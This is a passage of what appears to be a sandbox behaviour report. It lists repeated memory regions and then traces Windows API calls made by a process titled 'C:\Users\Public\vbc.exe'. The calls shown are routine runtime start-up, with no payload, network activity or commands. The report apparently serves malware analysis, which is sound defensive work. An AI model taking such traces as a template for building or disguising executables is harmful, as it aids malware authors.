"private_0x00000000025e0000" filename = "" Region: id = 1765 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1766 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1767 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1768 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1769 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1770 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1771 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1772 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1773 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1774 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1775 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1776 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1777 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1778 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1779 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1780 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1781 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1782 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1783 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1784 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1785 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1786 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1787 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1788 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1789 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1790 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1791 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1792 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1793 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1794 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1795 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1796 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1797 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1798 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1799 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1800 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1801 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1802 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1803 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1804 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1805 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1806 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1807 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1808 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1809 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1810 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1811 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1812 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1813 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1814 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1815 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1816 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Thread: id = 43 os_tid = 0x10f0 [0155.371] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff74 | out: lpSystemTimeAsFileTime=0x19ff74*(dwLowDateTime=0x47b825b0, dwHighDateTime=0x1d7b429)) [0155.371] GetCurrentProcessId () returned 0x10ec [0155.371] GetCurrentThreadId () returned 0x10f0 [0155.371] GetTickCount () returned 0x19626c7 [0155.371] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff6c | out: lpPerformanceCount=0x19ff6c*=2671823905400) returned 1 [0155.372] GetStartupInfoA (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\Public\\vbc.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0155.372] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1f90000 [0155.373] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0155.373] GetProcAddress (hModule=0x74530000, lpProcName="FlsAlloc") returned 0x7454a980 [0155.373] GetProcAddress (hModule=0x74530000, lpProcName="FlsGetValue") returned 0x74547570 [0155.373] GetProcAddress (hModule=0x74530000, lpProcName="FlsSetValue") returned 0x74549e30 [0155.373] GetProcAddress (hModule=0x74530000, lpProcName="FlsFree") returned 0x74554ff0 [0155.374] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0155.374] GetProcAddress (hModule=0x74530000, lpProcName="EncodePointer") returned 0x772bf730 [0155.374] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0155.375] GetProcAddress (hModule=0x74530000, lpProcName="EncodePointer") returned 0x772bf730 [0155.375] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0155.375] GetProcAddress (hModule=0x74530000, lpProcName="EncodePointer") returned 0x772bf730 [0155.375] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0155.375] GetProcAddress (hModule=0x74530000, lpProcName="EncodePointer") returned 0x772bf730 [0155.375] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0155.375] GetProcAddress (hModule=0x74530000, lpProcName="EncodePointer") returned 0x772bf730 [0155.376] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0155.376] GetProcAddress (hModule=0x74530000, lpProcName="EncodePointer") returned 0x772bf730 [0155.376] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0155.376] GetProcAddress (hModule=0x74530000, lpProcName="EncodePointer") returned 0x772bf730 [0155.377] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0155.377] GetProcAddress (hModule=0x74530000, lpProcName="DecodePointer") returned 0x772bd830 [0155.377] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x214) returned 0x1f905a8 [0155.377] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0155.377] GetProcAddress (hModule=0x74530000, lpProcName="DecodePointer") returned 0x772bd830 [0155.377] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0155.377] GetProcAddress (hModule=0x74530000, lpProcName="EncodePointer") returned 0x772bf730 [0155.377] GetProcAddress (hModule=0x74530000, lpProcName="DecodePointer") returned 0x772bd830 [0155.378] GetCurrentThreadId () returned 0x10f0 [0155.378] GetStartupInfoA (in: lpStartupInfo=0x19fe9c | out: lpStartupInfo=0x19fe9c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\Public\\vbc.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0155.378] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x800) returned 0x1f907c8 [0155.378] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0155.378] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0155.378] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0155.378] SetHandleCount (uNumber=0x20) returned 0x20 [0155.378] GetCommandLineA () returned="\"C:\\Users\\Public\\vbc.exe\" " [0155.378] GetEnvironmentStringsW () returned 0x851fd8* [0155.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1548, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1548 [0155.379] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x0, Size=0x60c) returned 0x1f90fd0 [0155.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1548, lpMultiByteStr=0x1f90fd0, cbMultiByte=1548, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1548 [0155.379] FreeEnvironmentStringsW (penv=0x851fd8) returned 1 [0155.379] GetLastError () returned 0x0 [0155.379] SetLastError (dwErrCode=0x0) [0155.379] GetLastError () returned 0x0 [0155.379] SetLastError (dwErrCode=0x0) [0155.379] GetLastError () returned 0x0 [0155.379] SetLastError (dwErrCode=0x0) [0155.379] GetACP () returned 0x4e4 [0155.379] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x0, Size=0x220) returned 0x1f915e8 [0155.380] GetLastError () returned 0x0 [0155.380] SetLastError (dwErrCode=0x0) [0155.380] IsValidCodePage (CodePage=0x4e4) returned 1 [0155.380] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0155.380] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0155.380] GetLastError () returned 0x0 [0155.380] SetLastError (dwErrCode=0x0) [0155.380] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x19f8d8 | out: lpCharType=0x19f8d8) returned 1 [0155.380] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0155.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ艡@Ā") returned 256 [0155.381] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ艡@Ā", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0155.381] GetLastError () returned 0x0 [0155.381] SetLastError (dwErrCode=0x0) [0155.381] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0155.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0155.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0155.381] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0155.381] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0155.381] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x14\x1c\x9e_\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0155.381] GetLastError () returned 0x0 [0155.381] SetLastError (dwErrCode=0x0) [0155.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0155.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0155.382] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0155.382] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0155.382] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 